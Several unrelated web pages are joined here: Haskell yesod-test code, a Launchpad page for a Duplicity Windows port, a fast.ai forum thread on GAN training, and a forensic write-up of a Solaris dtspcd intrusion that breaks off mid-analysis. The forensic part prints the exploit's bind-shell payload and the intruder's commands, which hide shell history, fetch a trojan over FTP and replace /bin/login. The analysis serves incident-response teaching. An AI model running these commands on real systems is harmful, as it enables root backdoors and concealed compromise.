    BS8.concat $ separator : [BS8.concat [multipartPart p, separator] | p <- parts]
  multipartPart (ReqPlainPart k v) = BS8.concat
    [ "Content-Disposition: form-data; "
    , "name=\"", (BS8.pack k), "\"\r\n\r\n"
    , (BS8.pack v), "\r\n"]
  multipartPart (ReqFilePart k v bytes mime) = BS8.concat
    [ "Content-Disposition: form-data; "
    , "name=\"", BS8.pack k, "\"; "
    , "filename=\"", BS8.pack v, "\"\r\n"
    , "Content-Type: ", BS8.pack mime, "\r\n\r\n"
    , BS8.concat $ BSL8.toChunks bytes, "\r\n"]

  -- For building the regular non-multipart requests
  makeSinglepart cookie parts = SRequest
    (mkRequest [("Cookie",cookie), ("Content-Type", "application/x-www-form-urlencoded")]) $
    BSL8.pack $ DL.concat $ DL.intersperse "&" $ map singlepartPart parts
  singlepartPart (ReqFilePart _ _ _ _) = ""
  singlepartPart (ReqPlainPart k v) = concat [k,"=",v]

  -- General request making
  mkRequest headers = defaultRequest
    { requestMethod = method
    , remoteHost = Sock.SockAddrInet 1 2
    , requestHeaders = headers
    , rawPathInfo = url
    , pathInfo = DL.filter (/="") $ T.split (== '/') $ TE.decodeUtf8 url
    }

-- | Run a persistent db query. For asserting on the results of performed actions
-- or setting up pre-conditions. At the moment this part is still very raw.
runDB :: SqlPersist IO a -> OneSpec a
runDB query = do
  OneSpecData _ pool _ _ <- ST.get
  liftIO $ runSqlPool query pool

-- Yes, just a shortcut
failure :: (MonadIO a) => String -> a b
failure reason = (liftIO $ HUnit.assertFailure reason) >> error ""
http://hackage.haskell.org/package/yesod-test-0.2.0.5/docs/src/Yesod-Test.html
lp:~kevinoid/duplicity/windows-port

A branch for development work porting Duplicity to run natively on Windows.

- Get this branch:
- bzr branch lp:~kevinoid/duplicity/windows-port

Branch merges
- duplicity-team: Pending requested 2010-10-25
- Diff: 1552 lines (+668/-245), 18 files modified:
dist/makedist (+58/-35)
dist/setup.py (+9/-10)
duplicity-bin (+96/-17)
duplicity.1 (+5/-3)
duplicity/GnuPGInterface.py (+215/-127)
duplicity/backend.py (+14/-1)
duplicity/backends/localbackend.py (+10/-1)
duplicity/commandline.py (+14/-1)
duplicity/compilec.py (+16/-3)
duplicity/dup_temp.py (+9/-5)
duplicity/globals.py (+48/-5)
duplicity/manifest.py (+9/-3)
duplicity/patchdir.py (+15/-0)
duplicity/path.py (+102/-17)
duplicity/selection.py (+21/-11)
duplicity/tarfile.py (+6/-2)
po/update-pot (+0/-4)
po/update-pot.py (+21/-0)

Related bugs
Related blueprints

Branch information
- Owner: Kevin Locke
- Status: Mature

Recent revisions

- 703. By Kevin Locke <email address hidden> on 2010-10-25

Include updates to GnuPGInterface

These updates are from the current state of a branch of development that I created to port GnuPGInterface to Windows, fix some bugs, and add Python 3 support. The branch is available on github at <http://github.com/kevinoid/py-gnupg>. These changes are taken from commit 91667c. I have assurances from the original author of GnuPGInterface that the changes will be merged into his sources with minimal changes (if any) once he has time and that it is safe to merge these changes into other projects that need them without introducing a significant maintenance burden.

Note: This version of GnuPGInterface now uses subprocess rather than "raw" fork/exec. The threaded waitpid was removed due to threading issues with subprocess (particularly Issue 1731717). It should be largely unnecessary as any zombie child processes are reaped when a new subprocess is started. If the more immediate reaping is required, the threaded wait can easily be re-added (and less easily be made thread safe with subprocess).

Signed-off-by: Kevin Locke <email address hidden>

- 702. By Kevin Locke <email address hidden> on 2010-10-25

Unwrap temporary file instances

tempfile.TemporaryFile returns an instance of a wrapper class on non-POSIX, non-Cygwin systems. Yet the librsync code requires a standard file object. On Windows, the wrapper is unnecessary since the file is opened with O_TEMPORARY and is deleted automatically on close. On other systems the wrapper may be necessary to delete a file, so we error out (in a way that future developers on those systems should be able to find and understand...).

Note: This is a bit of a hack and relies on undocumented properties of the object returned from tempfile.TemporaryFile. However, it avoids the need to track and delete the temporary file ourselves.

Signed-off-by: Kevin Locke <email address hidden>

- 701. By Kevin Locke <email address hidden> on 2010-10-25

Make the manifest format more interoperable

At the cost of losing a bit of information, use the POSIX path and EOL convention as part of the file format for manifest files. This way backups created on one platform can be restored on another with a different path and/or EOL convention. To accomplish this, change the file mode to binary and convert native paths to POSIX paths during manifest creation and back during load.

Note: During load, the drive specifier for the target directory (if there is one) is added to the POSIX-converted path. This allows restoring cross-platform files more easily at the cost of losing a warning about restoring files to a different drive than the original backup. If this is unacceptable, the drive could be the first component of the POSIX path or the cross-platform interoperability could be dropped.

Signed-off-by: Kevin Locke <email address hidden>

- 700. By Kevin Locke <email address hidden> on 2010-10-25

Prevent Windows paths from being parsed as URLs

Windows paths which begin with a drive specifier are parsed as having a scheme which is the drive letter. In order to guard against these paths being treated as URLs, check if the potential url_string looks like a Windows path.

Note: The regex is not perfect, since it is possible that the "c" URL scheme would not require slashes after the protocol. So limit the checks to Windows platforms, where paths are more likely to have this form.

Signed-off-by: Kevin Locke <email address hidden>

- 699. By Kevin Locke <email address hidden> on 2010-10-25

Make file:// URL parsing more portable

Create a path.from_url_path utility function which takes the path component of a file URL and converts it into the native path representation on the platform.

Note: RFC 1738 specifies that anything after file:// before the next slash is a hostname (and therefore, implicitly, all paths are absolute). However, to maintain backwards compatibility, allow for relative paths to be specified in this manner.

Signed-off-by: Kevin Locke <email address hidden>

- 698. By Kevin Locke <email address hidden> on 2010-10-25

Ensure prefix ends with empty path component

WARNING: Functionality change

In order to prevent the given prefix from matching directories which begin with the last component of prefix, ensure that prefix ends with an empty path component (causing a trailing slash on POSIX systems). Otherwise the prefix /foo/b would also include /foo/bar.

Note: If this functionality really was intended, wherever prefix is removed from a path, the result should not start with a directory separator (since it would result in a "/" first element in the return value from path.split_all).

Signed-off-by: Kevin Locke <email address hidden>

- 697. By Kevin Locke <email address hidden> on 2010-10-25

Replace path manipulation based on "/"

Make use of path.split_all and os.path.join where paths were manipulated based on "/". In selection, change the path import to keep the path namespace, but alias path.Path to Path to minimize the diff. The bare uses of split_all seemed unnecessarily confusing and the other members of path are not used directly, so there is no real need for the * import.

Note: Removed unnecessary use of filter to remove blanks as this is handled implicitly by os.path.split and therefore by path.split_all.

Note2: Need to be careful that os.path.join must have at least 1 argument, while "/".join() could work on a 0-length array.

Signed-off-by: Kevin Locke <email address hidden>

- 696. By Kevin Locke <email address hidden> on 2010-10-25

Create split_all utility function in path

This function is intended to replace the pathstr.split("/") idiom in many places and provides a convenient way to break an arbitrary path into its constituent components.

Note: Although it would be possible to split on os.altsep and os.sep, and it would work in many cases and run a bit faster, it doesn't handle more complex path systems and is likely to fail in corner cases even in less complex path systems.

Signed-off-by: Kevin Locke <email address hidden>

- 695. By Kevin Locke <email address hidden> on 2010-10-25

Support systems without pwd and/or grp in tarfile

Inside tarfile this case is normally checked by the calling code, but since uid2uname and gid2gname are called by Path without checking for pwd and grp (and we want to support this case), remove the assertion that these modules are defined. When they are not, throw KeyError indicating the ID could not be mapped.

Signed-off-by: Kevin Locke <email address hidden>

- 694. By Kevin Locke <email address hidden> on 2010-10-25

Support more path systems in glob->regex conversion

- Match against the system path separators, rather than "/"
- Update the duplicity.1 man page to indicate that the metacharacters match against the directory separator, rather than "/"

Note: This won't be portable to systems with more complex path systems (like VMS), but that case is not trivial so it is worth waiting for a need to arise.

Signed-off-by: Kevin Locke <email address hidden>

Branch metadata
- Branch format: Branch format 7
- Repository format: Bazaar repository format 2a (needs bzr 1.16 or later)
- Stacked on: lp:duplicity/0.7-series
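As an illustration of the kind of change revision 694 describes (making glob metacharacters stop at the platform's directory separators rather than at a literal "/"), here is a rough Python sketch. It is a simplification written for this page, not duplicity's actual conversion code:

```python
import os
import re

def glob_to_regex(pattern):
    """Convert a simple glob to a regex whose wildcards stop at the
    platform's directory separator(s), not just at a literal '/'."""
    # Character class of separators for this platform; os.altsep covers
    # the '/' alternative on Windows.
    seps = re.escape(os.sep + (os.altsep or ""))
    out = []
    for ch in pattern:
        if ch == "*":
            out.append("[^%s]*" % seps)   # '*' never crosses a separator
        elif ch == "?":
            out.append("[^%s]" % seps)    # '?' matches one non-separator char
        else:
            out.append(re.escape(ch))
    return "".join(out) + r"\Z"

# 'foo*' matches within one path component only:
print(bool(re.match(glob_to_regex("foo*"), "foobar")))                # True
print(bool(re.match(glob_to_regex("foo*"), "foo" + os.sep + "bar")))  # False
```

A full implementation would also have to handle character classes like [abc] and the ** extension, which this sketch ignores.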
https://code.launchpad.net/~kevinoid/duplicity/windows-port
The WGAN paper shows some fairly compelling theory and empirical evidence that their approach is strictly superior.

Lesson 10 Discussion

Why do some images end up with floats as pixel values instead of uint8? I'm trying to find a way to type .astype("uint8") less.

Apologies if this has been posted before, but one resource I've found particularly useful in trying to understand how and why the Wasserstein GAN fixes the problems of normal GANs is this r/MachineLearning thread, wherein you can see the original author of the paper discussing it and answering questions about it. One particularly valuable framing for me, posted by the author, was:

There are two elements that make the transition to the Wasserstein distance. Taking out the sigmoid in the discriminator, and the difference between the means (equation 2). While it's super simple in the end, and looks quite similar to a normal GAN, there are some fundamental differences. The outputs are no longer probabilities, and the loss now has nothing to do with classification. The critic now is just a function that tries to have (in expectation) low values in the fake data, and high values in the real data. If it can't, it's because the two distributions are indeed similar.

The weight clipping. This constrains how fast the critic can grow. If two samples are close, the critic will have no option but to have values that are close for them. In a normal GAN, if you train the discriminator well, it will learn to put a 0 on fake and a 1 on real, regardless of how close they are, as long as they're not the same point.

In the end, the flavor in here is much more 'geometric' than 'probabilistic', as before. It's not about differentiating real from fake. It's about having high values on real, and low values on fake. Since how much you can grow is constrained by the clipping, as samples get closer this difference will shrink.
This is much more related to the concept of 'distance' between samples, than to the probability of being from one distribution or the other.

I tried out WGAN on ~11K dog images from cats/dogs redux. Perhaps it's because I don't have enough time to train, i.e. 5 weeks, but the results weren't so hot… Anyone looking for a "quick turnaround" with WGAN may be disappointed. The generator loss bounced around a TON during training, but did seem to continually go down, little by little. I held the learning rate constant at .0001.

After 10 epochs (~3 mins): Loss_D: -1.547441 Loss_G: 0.754658 Loss_D_real: -0.807306 Loss_D_fake 0.740135
After 250 epochs (~1 hour): Loss_D: -0.2407 Loss_G: 0.10603 Loss_D_real: -.004035 Loss_D_fake 0.2367
After 2300 epochs (~8 hours): Loss_D: -0.080403 Loss_G: -0.134346 Loss_D_real: -0.385072 Loss_D_fake -0.304669

Actual doggy images:

Some questions I'm pondering:
- How do we know WGANs aren't regenerating the same images from the training set? Is there an easy way to confirm this is "new" content?
- What is the max size of images we can realistically generate? The images above are very small.
- How long would this take to train on the 3M LSUN images running on 1 fast GPU?
- Can we do transfer learning with WGAN to speed things up?
- What do the negative loss values above represent?

Most generative model papers show a way to do this - take a look at GAN, DCGAN, and WGAN, and tell us what you find! Overall, I think your expectations may be too high… There are too many different kinds of dogs I think, and also our eyes are good at recognizing things that look like real animals. I think of WGAN as being something we should add on top of other generative models (like style transfer, colorization, etc).

Anyone had luck with training the DCGAN with the MNIST data set? I saw some examples on the web where folks got pretty compelling results using DCGAN. I tried DCGAN, but below are the images I have to date.
wondering how far we can push DCGAN to get better results?

@rodgzilla and I were wondering the same thing. I created a way to check MNIST images using MSE and the results seem reasonably accurate. You may need to customize it for multiple channels etc, I just flattened the images. Here is the code.

Hi @kelvin @jeremy I am not sure I follow how the classids.txt file is being generated. In the original notebook the code is

classid_lines = open(path+'/../classids.txt', 'r').readlines()

which means it was expecting the file to be there. Was the file available in platform.ai/files?

Ok… I am running into another issue in this notebook. What was the mid_out.output_shape and rn_top_avg.output_shape you got? I am getting (None, 14, 14, 1024) and (None, 2, 2, 1024). Then I am getting this error for gen_features_mid(1):

ValueError: Error when checking : expected input_4 to have shape (None, 224, 224, 3) but got array with shape (128, 72, 72, 3)

Any ideas what I am missing? Is this notebook compiled against theano by any chance?

Just looking at the summary of my model - the dimensions don't look right. 1, 1, 512?

res5a_branch2a (Convolution2D) (None, 1, 1, 512) 524800 activation_321[0][0]
bn5a_branch2a (BatchNormalizatio (None, 1, 1, 512) 2048 res5a_branch2a[0][0]
activation_322 (Activation) (None, 1, 1, 512) 0 bn5a_branch2a[0][0]
res5a_branch2b (Convolution2D) (None, 1, 1, 512) 2359808 activation_322[0][0]
A quick search only brings up the differences in memory allocation between np.zeros and np.zeros_like, but clearly this results indicate more differences than that. How long should it take the wgan pytorch to train on the cifar10 dataset with 200 epochs and Titan X GPU? I ran the code but it doesn’t seem to be using all of the GPU memory. Also, where can I download the LSUN dataset? Thanks all. Hi all, I was going through the imagenet_process.ipynb and noticed that each time we append resized image to arr, the size of arr is increased.Only after collecting all resized images in arr, we are writing it to hard disk.This maynot be feasible for resizing entire imagenet because of limited RAM. Has anyone figured out how to write in batches ? Thank You Maybe the content layers’ choices problem? The original paper suggested using the conv3_3, but I saw many other implementations are using more than just one layer, just give these layers different weights, maybe it would help (I haven’t tried that yet, but I’m about to get there). Hi @brendan, I’m having same issues. I was able to get speedups similar to that mentioned in docs.But when I try resizing sample imagenet I am getting similar runtimes for both pillow and pillow-simd. Have you figured it out ? Thank you UPDATE: I found out that the variable arr isn’t actually stored in RAM. But it behaves like it is in RAM.When you do arr.shape it prints out the shape(i.e 1millionx224x224x3), and when you try to display a random image it will display.It only accesses the image when called upon i.e lazy evaluation. You can resize entire imagenet. threading.local seems almost magical. @jeremy @rachel The authors of the DCGAN paper tell that they scaled the images to a range of [-1, 1] and used tanh as the activation function in the last layer of the generator. Also use the alpha(slope) of LeakyRelu as 0.2. 
So I did these things and got rid of the first Dense layer in the discriminator as the authors tell to eliminate the fully connected(Dense) layers. Then I trained the model for 50 epochs. Each epoch takes around 35 secs on a Tesla K80. Look at the results that I got. Code for this. By the way, Mendeley desktop is awesome. Thanks for suggesting it
https://forums.fast.ai/t/lesson-10-discussion/1807?page=5
An attacker has compromised a Sun Solaris server on a production network using an exploit for the dtspcd service in CDE, a Motif-based graphical user environment for Unix systems. You are the senior security engineer of the Security Operations Center (SOC) for your company and are required to find out how the box was compromised and by whom. Using only a Snort binary capture file from the remote log server, you are to conduct a complete analysis of all IDS captures, log files, and an inspection of the file system.

This paper will deconstruct the steps taken to conduct a full analysis of a compromised machine. In particular, we will be examining the tool that was used to exploit a dtspcd buffer overflow vulnerability, which allows remote root access to the system. The objective of this paper is to show the value of IDS logs in conducting forensics investigations.

Analyzing the Logs

The following section will discuss the methods and techniques used in analysing and assessing the problem at hand. This investigation will use a Snort binary file that was generously provided by Lance Spitzner and the Honeynet Project. After downloading the Snort binary capture file to my workstation, I began work immediately. I first untarred the Snort logs and checked to see the type of file format they were captured in.

-bash-2.05b$ tar -zxvf 0108@000-snort.log.tar.gz
-bash-2.05b$ file 0108@000-snort.log
tcpdump capture file (big-endian) - version 2.4 (Ethernet, capture length 1514)

I skimmed the packets and immediately started to ascertain what had happened, which I will explain in detail below.

14:46:04.378306 adsl-61-1-160.dab.bellsouth.net.3592 > 172.16.1.102.6112: P 1:1449(1448) ack 1 win 16060 <nop,nop,timestamp 463986683 4158792> (DF)
0x0000 4500 05dc a1ac 4000 3006 241c d03d 01a0 E.....@.0.$..=..
0x0010 ac10 0166 ..@...@...@...@.
0x0070 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0080 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0090 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00a0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00b0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00c0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00f0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
[logs cut short due to repeated patterns]

Something worth noting in this packet are the "@" symbols above; the hexadecimal value 0x801c4011 is the NOP instruction code for the SPARC architecture. The more familiar NOP, 0x90, only works on i386 machines. What exactly is a NOP slide? It's a means of padding the buffer in an exploit where it is not immediately known where code execution will begin. If the exploit points to any place in the NOP padding, the CPU will follow the NOP slide into the executable code.

I then used tcpdump to output all the hex dumps of each packet sent to this specific destination IP into readable format.

-bash-2.05b$ tcpdump -X -r 0108@000-snort.log host 172.16.1.102

Piecing together "The Big Picture"

As I went down through the logs I found the packet responsible for executing code on the server:

[beginning of packet removed due to NOP slides]

0x04d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x04e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0520 c023 ffec 8210 200b 91d0 2008 2f62 696e .#........../bin 0x0530 2f6b 7368 2020 2020 2d63 2020 6563 686f /ksh....-c..echo 0x0540 2022 696e 6772 6573 6c6f 636b 2073 7472 ."ingreslock.str 0x0550 6561 6d20 7463 7020 6e6f 7761 6974 2072 eam.tcp.nowait.r 0x0560 6f6f 7420 2f62 696e 2f73 6820 7368 202d oot./bin/sh.sh.- 0x0570 6922 3e2f 746d 702f 783b 2f75 7372 2f73 i">/tmp/x;/usr/s 0x0580 6269 6e2f 696e 6574 6420 2d73 202f 746d bin/inetd.-s./tm 0x0590 702f 783b 736c 6565 7020 3130 3b2f 6269 p/x;sleep.10;/bi 0x05a0 6e2f 726d 202d 6620 2f74 6d70 2f78 2041 n/rm.-f./tmp/x.A 0x05b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0x05c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0x05d0 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAA Code executed: ./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x As we can see, the exploit makes use of the Korn shell by creating a file within the /tmp directory called "x". Within this file, it creates an inetd.conf style entry and starts the inet daemon, using the file "/tmp/x" as its configuration file. This spawns a root shell on the ingreslock port (1524/tcp). The ingreslock port has had a history of exploit shells bound to it, including, but not limited to, rpc.cmsd, statd, and tooltalk. As you can see, dtspcd is in good company. The first step in our analysis is complete. We have now discovered how the intruder managed to gain access to the system. We can now take a second look at the logs, taking in all relevant information regarding port 1524/tcp where the intruder is sure to have opened up some sort of raw connection (most likely telnet) to issue commands on the server. 14:46:18.398427 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: P 1:209(208) ack 1 win 16060 <nop,nop,timestamp 463988091 4160200> (DF) 0x0000 4500 0104 a1cc 4000 3006 28d4 d03d 01a0 E.....@.0.(..=.. 
0x0010 ac10 0166 0e0c 05f4 fff7 8025 5fbb 0117 ...f.......%_... 0x0020 8018 3ebc 5082 0000 0101 080a 1ba7 e57b ..>.P..........{ 0x0030 003f 7ac8 756e 616d 6520 2d61 3b6c 7320 .?z.uname.-a;ls. 0x0040 2d6c 202f 636f 7265 202f 7661 722f 6474 -l./core./var/dt 0x0050 2f74 6d70 2f44 5453 5043 442e 6c6f 673b /tmp/DTSPCD.log; 0x0060 5041 5448 3d2f 7573 722f 6c6f 6361 6c2f PATH=/usr/local/ 0x0070 6269 6e3a 2f75 7372 2f62 696e 3a2f 6269 bin:/usr/bin:/bi 0x0080 6e3a 2f75 7372 2f73 6269 6e3a 2f73 6269 n:/usr/sbin:/sbi 0x0090 6e3a 2f75 7372 2f63 6373 2f62 696e 3a2f n:/usr/ccs/bin:/ 0x00a0 7573 722f 676e 752f 6269 6e3b 6578 706f usr/gnu/bin;expo 0x00b0 7274 2050 4154 483b 6563 686f 2022 4244 rt.PATH;echo."BD 0x00c0 2050 4944 2873 293a 2022 6070 7320 2d66 .PID(s):."`ps.-f 0x00d0 6564 7c67 7265 7020 2720 2d73 202f 746d ed|grep.'.-s./tm 0x00e0 702f 7827 7c67 7265 7020 2d76 2067 7265 p/x'|grep.-v.gre 0x00f0 707c 6177 6b20 277b 7072 696e 7420 2432 p|awk.'{print.$2 0x0100 7d27 600a }'`. This packet shows us the commands that were run when the intruder made a raw connection with port 2514/tcp.}'` Obviously, this was an automated command, which was executed once a raw connection was established with the compromised system. We can tell this from the time-stamps on each Snort packet. We know the command was issued at exactly, 14:46:18.398427, as seen in the above packet dump. As evident from the logs, the command was then processed and executed, all in under a single second, at 14:46:18.901413. The packet dumps below explain more: This packet follows the automated command above. 14:46:18.399867 172.16.1.102.6112 > adsl-61-1-160.dab.bellsouth.net.3595: . ack 4180 win 24616 <nop,nop,timestamp 4160216 463988091> (DF) 0x0000 4500 0034 6aa0 4000 3f06 51d0 ac10 0166 E..4j.@.?.Q....f 0x0010 d03d 01a0 17e0 0e0b 5f82 f43f fee0 9c9b .=......_..?.... 0x0020 8010 6028 05dd 0000 0101 080a 003f 7ad8 ..`(.........?z. 
0x0030 1ba7 e57b ...{ 14:46:18.400270 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: . ack 209 win 24408 <nop,nop,timestamp 4160216 463988091> (DF) 0x0000 4500 0034 6aa1 4000 3f06 51cf ac10 0166 E..4j.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0117 fff7 80f5 .=......_....... 0x0020 8010 5f58 2617 0000 0101 080a 003f 7ad8 .._X&........?z. 0x0030 1ba7 e57b ...{ 14:46:18.421722 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 1:3(2) ack 209 win 24616 <nop,nop,timestamp 4160218 463988091> (DF) 0x0000 4500 0036 6aa2 4000 3f06 51cc ac10 0166 E..6j.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0117 fff7 80f5 .=......_....... 0x0020 8018 6028 021b 0000 0101 080a 003f 7ada ..`(.........?z. 0x0030 1ba7 e57b 2320 ...{#. 14:46:18.502830 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 3 win 16060 <nop,nop,timestamp 463988109 4160218> (DF) 0x0000 4500 0034 a1ce 4000 3006 29a2 d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 0119 ...f........_... 0x0020 8010 3ebc 469d 0000 0101 080a 1ba7 e58d ..>.F........... 0x0030 003f 7ada .?z. 14:46:18.505611 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 3:98(95) ack 209 win 24616 <nop,nop,timestamp 4160227 463988109> (DF) 0x0000 4500 0093 6aa3 4000 3f06 516e ac10 0166 E...j.@.?.Qn...f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0119 fff7 80f5 .=......_....... 0x0020 8018 6028 2401 0000 0101 080a 003f 7ae3 ..`($........?z. 0x0030 1ba7 e58d 5375 6e4f 5320 6275 7a7a 7920 ....SunOS.buzzy. 0x0040 352e 3820 4765 6e65 7269 635f 3130 3835 5.8.Generic_1085 0x0050 3238 2d30 3320 7375 6e34 7520 7370 6172 28-03.sun4u.spar 0x0060 6320 5355 4e57 2c55 6c74 7261 2d35 5f31 c.SUNW,Ultra-5_1 0x0070 300a 2f63 6f72 653a 204e 6f20 7375 6368 0./core:.No.such 0x0080 2066 696c 6520 6f72 2064 6972 6563 746f .file.or.directo 0x0090 7279 0a ry. 14:46:18.610945 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . 
ack 98 win 16060 <nop,nop,timestamp 463988120 4160227< (DF) 0x0000 4500 0034 a1cf 4000 3006 29a1 d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 0178 ...f........_..x 0x0020 8010 3ebc 462a 0000 0101 080a 1ba7 e598 ..>.F*.......... 0x0030 003f 7ae3 .?z. 14:46:18.612370 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 98:148(50) ack 209 win 24616 <nop,nop,timestamp 4160237 463988120> (DF) 0x0000 4500 0066 6aa4 4000 3f06 519a ac10 0166 E..fj.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0178 fff7 80f5 .=......_..x.... 0x0020 8018 6028 83ff 0000 0101 080a 003f 7aed ..`(.........?z. 0x0030 1ba7 e598 2f76 6172 2f64 742f 746d 702f ..../var/dt/tmp/ 0x0040 4454 5350 4344 2e6c 6f67 3a20 4e6f 2073 DTSPCD.log:.No.s 0x0050 7563 6820 6669 6c65 206f 7220 6469 7265 uch.file.or.dire 0x0060 6374 6f72 790a ctory. 14:46:18.710415 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 148 win 16060 (DF) 0x0000 4500 0034 a1d1 4000 3006 299f d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 01aa ...f........_... 0x0020 8010 3ebc 45e4 0000 0101 080a 1ba7 e5a2 ..>.E........... 0x0030 003f 7aed .?z. 14:46:18.801409 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 148:164(16) ack 209 win 24616 <nop,nop,timestamp 4160256 463988130> (DF) 0x0000 4500 0044 6aa5 4000 3f06 51bb ac10 0166 E..Dj.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 01aa fff7 80f5 .=......_....... 0x0020 8018 6028 9c52 0000 0101 080a 003f 7b00 ..`(.R.......?{. 0x0030 1ba7 e5a2 4244 2050 4944 2873 293a 2033 ....BD.PID(s):.3 0x0040 3437 360a 476. 14:46:18.901413 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 164 win 16060 <nop,nop,timestamp 463988149 4160256> (DF) 0x0000 4500 0034 a1d3 4000 3006 299d d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 01ba ...f........_... 0x0020 8010 3ebc 45ae 0000 0101 080a 1ba7 e5b5 ..>.E........... 0x0030 003f 7b00 .?{. 
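Reading the commands out of these dumps by eye gets tedious. As an aside, the hex columns can also be decoded mechanically; the helper below is my own illustration (not part of Snort, tcpdump, or Ethereal) that strips the offset column and ASCII gutter from tcpdump -X style lines and decodes the remaining hex bytes:

```python
import re

def decode_hexdump(dump):
    """Recover raw bytes from 'offset  hex hex ...  ascii' style lines."""
    data = bytearray()
    for line in dump.splitlines():
        # Offset column, then one or more groups of 2-4 hex digits each
        # followed by whitespace; the ASCII gutter is left unmatched.
        m = re.match(r"\s*0x[0-9a-f]+\s+((?:[0-9a-f]{2,4}\s+)+)", line)
        if not m:
            continue
        for group in m.group(1).split():
            data.extend(bytes.fromhex(group))
    return bytes(data)

sample = """\
0x0000  6563 686f 2068 656c 6c6f                 echo.hello
"""
print(decode_hexdump(sample))  # b'echo hello'
```

Run over the ingreslock packets above, this recovers the same command strings that tcpdump prints in the right-hand gutter, but without the lossy "." substitutions for non-printable characters.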
Executed Commands

I have provided only a few of the numerous commands executed by the intruder. The following are some of the manual commands issued within an interactive shell. I can tell the automated and manual commands apart by the session timing as each command is executed; the manual commands were issued only after the automated commands had completed. Each command and reply are shown below:

# w
8:47am up 11:24, 0 users, load average: 0.12, 0.04, 0.02
User tty login@ idle JCPU PCPU what
# unset HISTFILE
# cd /tmp
mkdir /usr/lib
# mkdir: Failed to make directory "/usr/lib"; File exists
# mv /bin/login /usr/lib/libfl.k
# ftp 64.224.118.115
ftp
ftp: ioctl(TIOCGETP): Invalid argument
Password:a@
cd pub
binary
get sun1
bye
Name (64.224.118.115:root): #
# ls
ps_data sun1
# chmod 555 sun1
# mv sun1 /bin/login

FTP Session Analysis

The above text in bold was then further broken down using Ethereal's Follow TCP Stream option.

220 widcr0004atl2.interland.net FTP server (Version wu-2.6.2(1) Tue Jan 8 07:50:31 EST 2002) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS a@
230 Guest login ok, access restrictions apply.
CWD pub
250 CWD command successful.
TYPE I
200 Type set to I.
PORT 172,16,1,102,130,234
200 PORT command successful.
RETR sun1
150 Opening BINARY mode data connection for sun1 (90544 bytes).
226 Transfer complete.
QUIT
221-You have transferred 90544 bytes in 1 files.
221-Total traffic for this session was 91042 bytes in 1 transfers.
221-Thank you for using the FTP service on widcr0004atl2.interland.net.
221 Goodbye.

As we can see, the intruder established an ftp connection to a remote machine and retrieved a file called "sun1". Once the ftp connection was closed, the intruder modified the file permissions of the sun1 file and renamed it to /bin/login, as seen in the session dump above. To take a closer look at this, I again used tcpdump to output all the ftp-port packets into readable format.
bash-2.05$ tcpdump -X -r 0108@000-snort.log port ftp-data

Judging by the intruder's last commands, it looks like some form of edited /bin/login program, obviously trojaned with a backdoor of some sort. I then decided to take another look at the Snort logs using Ethereal to reproduce the sun1 program, which allowed me to conduct a further analysis of what the program was.

Retrieving the "sun1" Binary File

Using Ethereal's TCP recovery feature, I opened up the Snort binary file, right clicked on one of the FTP-DATA packets, and selected "TCP Stream" from the Ethereal options. Once complete, I then saved the file under the name of "sun1" in ASCII format.

Analyzing the Binary

Once I saved the binary, I examined it with the file command:

-bash-2.05b$ file sun1
sun1: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped

We know that the sun1 file was compiled on a Sun operating system with all extra debugging information removed; that information could otherwise have aided us when using the strings command. But for what purpose was this binary file retrieved? Let's find out. Also, notice how the file is statically linked. This tells us that this binary doesn't call upon any libraries on the host system and can be run independently: the code is fully mobile from system to system.

First, let's give the strings command a try to see what we can pick up. We can do this by issuing the following command at our console.

strings

-bash-2.05b$ strings sun1 | more
I did not have a Sun box to run the binary file on in order to gather additional information.

-bash-2.05b$ DISPLAY=pirc

